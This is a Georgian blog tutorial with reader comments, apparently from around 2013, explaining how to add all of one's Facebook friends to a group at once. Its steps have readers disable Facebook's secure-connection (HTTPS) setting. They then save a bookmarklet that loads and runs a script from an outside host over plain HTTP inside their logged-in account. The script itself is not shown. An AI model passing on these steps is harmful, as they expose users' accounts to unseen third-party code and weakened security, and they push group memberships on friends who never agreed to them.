1 Star2 Stars3 Stars4 Stars5 Stars
Loading...Loading...

» Facebook-ის ჯგუფში ყველა მეგობრის ერთდროული დამატება

მოგესალმებით მეგობრებო 🙂
ეს რამოდენიმე ხანია ვეღარ ვიცლი და ჩანაწერებსაც ბუნებრივია ვეღარ ვაქვეყნებ ისე ინტენსიურად, როგორც ადრე 🙁

დღეს ამ ჩანაწერში მსურს შემოგთავაზოთ ძალიან გამოსადეგი საშვალება, რომლის დახმარებითაც ფეისბუქზე არსებულ ნებისმიერ ჯგუფში ერთი “კლიკით” გააწევრიანებთ ყველა თქვენს ფეისბუქელ მეგობრებს და არ დაგჭირდებათ მათი სათითაოდ დამატება სასურველ ჯგუფში.

მაშასე თუკი დაინტერესდით მაშინ მივყვეთ თანმიმდევრობას:

1. ხომ… აუცილებლივ გაითვალისწინეთ, რომ დაგვჭირდება ყველასათვის ნაცნობი ბროუზერი “Google Chrome”, რადგან დანარჩენში არ გამიტესტავს და არ ვარ დარწმუნებული თუ გამოვა. ესეიგი ვისაც არ გაქვთ დაინსტალეთ და ვისაც გაქვთ მასში გახსენით ფეისბუქის თქვენი “ექაუნთი” ანუ ანგარიში.
(“Google Chrome”-ს გადმოწერთ აქედან: Download Google Chrome)

2. შემდგომ მივყვეთ თანმიმდევრობათა ნუმერაციას, როგორც ეს ქვემოთა ფოტოზეა მოცემული:

Add All Friends In Your FaceBook Group With One Click

ანუ…
“ვკლიკავთ” “ანგარიშის პარამეტრები”-ზე, შემდგომ “უსაფრთხოება”-ზე და უსაფრთხოების პარამეტრებში მოცემულ ჩამონათვალში “უსაფრთხო კავშირი”-ის სანიშნს ამოვიღებთ ანუ ვთიშავთ, როგორც ეს ფოტოს მესამე მოქმედებაშია ნაჩვენები, სულ ბოლოს კი “ვკლიკავთ” ღილაკზე “ცვლილებების შენახვა”.
ეს მოქმედება აუცილებელია, რადგანაც წინააღმდეგ შენთხვევაში არ იმოქმედებს ჩვენი ჩანაფიქრი. მხოლოდ აუცილებლად დაიმახსოვრეთ, რომ მეგობრების დამატების ოპერაციის დასრულების შემდგომ ეს პარამეტრი დააბრუნეთ საწყის მდგომარეობაში.

3. შემდგომ საჭიროა გამოვიძახოთ “Google Chrome”-ის რჩეულთა ანუ “Bookmark”-ის ზდა ველი, ეს კი ხდება კლავიატურის შემდეგი კომბინაციის აკრეფით Ctrl+Shift+B, ანუ ეს როგორცაა ნაჩვენები ქვემო ფოტოს პირველ მოქმედებაში:

Add All Friends In Your FaceBook Group With One Click

შედეგად გამოჩნდება ზედა “Bookmark”-ის ველი (2), აქ კი მასზე მაუსის მარჯვენა ღილაკით “ვკლიკავთ” და ჩამოშლილ მენიუში ვირჩევთ გვერდის დამატებას ანუ “Add page…”-ს, რაც მოგვცემს შემდეგ ეტაპს.

4. გამოსულ “Bookmark”-ის სარკმელში შევიტანთ სათაურს (Name) და ქვემოთ (URL) მოცემულ ჯავა კოდს:

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://dl.gigol.net/fb/add.js';})();

და შემდგომ, როგორც ეს ფოტოზე ჩანს ვკლიკავთ შენახვაზე ანუ “Save”-ზე, რაც მოგვცემს შემდეგ ფინალურ ეტაპს ანუ ღილაკის მაგვარს “Bookmark”-ის ველში.

Add All Friends In Your FaceBook Group With One Click

ამით დასრულებულია ასევთქვათ “დამატების ხელსაწყოს” დაყენება-გაწყობა და ისღა რჩება, რომ გაუშვათ და ვნახოთ შედეგი.
მოგახსენებთ, რომ ეს პირველი ოთხი მთავარი ეტაპის გავლა მხოლოდ ერთხელ დაგჭირდებათ, რადგანაც შემდგომში მხოლოდ ღილაკზე კლიკით იმოქმედებთ.

5. შევდივართ სასურველ ჯგუფში, სადაც გვსურს, რომ დავამატოთ ყველა ჩვენი მეგობარი და უბრალოდ “ვკლიკავთ” ჩვენს მიერ შექმნილ ღილაკზე და ველოდებით რამოდენიმე წუთი რათა მოხდეს სრულფასოვანი სკანირება და მეგობრების გჯუფში ავტომატური დამატება:

Add All Friends In Your FaceBook Group With One Click

6. ჩემი მაგალითისთვის ქვემოთა ფოტოზე სულ აღმომიჩინა 615 მეგობარი და აქედან ჯგუფში დაამატა 272, თუმცა 1 მეგობრის სკანირება ჯერ არ დაუმთაბრებია:

Add All Friends In Your FaceBook Group With One Click

7. და ბოლოს გვიჩვენებს ფინალურ შედეგებს ანუ ჩემს მაგალითზე სულ იპოვა 615 მეგობარი და აქედან მოცემულ ჯგუფში დაამატა 272 მეგობარი. ბოლოს “ვაკლიკავთ” ღილაკს “დახურე” და მორჩა ;):

Add All Friends In Your FaceBook Group With One Click

ჩემის აზრით საკმაოდ მოხერხებული და გამოსადეგი საშვალებაა რათქაუნდა ვისაც აქვს ფეისბუქის ჯგუფებთან შეხება.

აგერ ვიდეოც ჩავწერე:

[ვიდეო...]
ვიდეოს გადმოწერა

სცადეთ და თუკი რაიმე ვერ გაიგოთ ან არ იმუშავა მომწერეთ კომენტარებში და შეძლებისდაგვარად ვეცდები გიპასუხოთ…
დროებით 😉

© აქ გამოქვეყნებული ნებისმიერი რესურსის გამოყენება, დასაშვებია მხოლოდ მისივე გვერდის ბმულის წყაროდ მითითებით!

2 კომენტარი ამ პოსტზე↓

ჩანიშნე ქვედა კომენტარების RSS 2.0 წყარო.
  1. გოჩა ამბობს:
    12 მაისი, 2013წ. 16:51სთ.

    ზემოთ აღწერილი ვარიანტი გავაკეთე. მაგრამ ერთი უცნაურობაა გუშინ დავამატე ერთ ჯგუფს მეგობრები. დღეს ვერ ვამატებ….იქნებ დამეხმაროთ რა ხდება?

    კარგია თუ ცუდი: Thumb up 0 Thumb down 0

  2. ილია ამბობს:
    16 დეკემბერი, 2013წ. 00:05სთ.

    შეიძლებ ფეისბუქმა რაიმე კონტროლი დააყენა და ბლოკავს

    კარგია თუ ცუდი: Thumb up 0 Thumb down 0

დატოვე კომენტარი↓

*გთხოვთ წეროთ ქართული ასოებით

 

 

XHTML: დამხმარე კოდები: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*

1 vote, average: 5.00 out of 51 vote, average: 5.00 out of 51 vote, average: 5.00 out of 51 vote, average: 5.00 out of 51 vote, average: 5.00 out of 5

› არაფერს ვნანობ

არაფერს ვნანობ…ჩემი ცხოვრების მე ვარ გამგე და მმართველი…გზაც კი ვიცი სხვისი ცხოვრებიდან წასასვლელი… ბევრი რამე მაქვს შესაცვლელი… დაუვიწყარი მე მაქვს წარსული… მასში ბევრია ჩემგან წასული… მგზნებარე ფერებით შეიღებება… მასზე კარგად › › ›

DU